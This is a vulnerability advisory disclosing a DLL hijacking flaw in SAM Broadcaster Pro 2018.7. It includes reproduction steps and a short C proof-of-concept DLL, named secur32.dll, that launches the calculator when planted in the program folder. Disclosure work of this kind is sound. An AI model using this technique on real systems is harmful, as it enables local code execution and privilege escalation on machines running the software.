Document Title: =============== Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution Product & Service Introduction: =============================== SAM Broadcaster is an Internet radio broadcasting application from Spacial. The name "SAM" is an acronym for Streaming Audio Manager, which describes the features of the software. The software includes features for running an Internet radio station from a single computer. (Copy of the Vendor Homepage: https://spacial.com/) Exploitation Technique: ======================= Remote Platfom Tested: =============== Windows 10 Technical Details & Description: ================================ A local Insecure Library Loading vulnerability has been discovered in the official Sambroadcaster Pro 2018.7 software. The issue allows local attackers to inject code to vulnerable dynamic link libraries to compromise the process or to gain higher system access privileges. Thus allows a local attacker to compromise the system process of the affected software to followup with manipulations. Vulnerable Software: [+] Sambroadcaster Pro Vulnerable version(s): [+] 2018.7 Affected Libraries: [+] secur32.dll Proof of Concept (PoC): ======================= The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction. the attacker will be able to take control of a computer and execute in the background a trojan horse or a ransonmware for example. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the local vulnerability ... 1. Compile dll 2. Rename the dynamic link library to secur32.dll 3. Copy secur32.dll to C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe 4. Launch SAMBC.exe 5. Now the calculator executes! -- PoC Exploit -- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void HrCreateConverter() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } Credits & Authors: ================== Social: twitter.com/@ZwX2a Contact : msk4@live.fr [#] Disclaimer: =============== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Copyright © 2018 | ZwX - Security Researcher (Software & web application)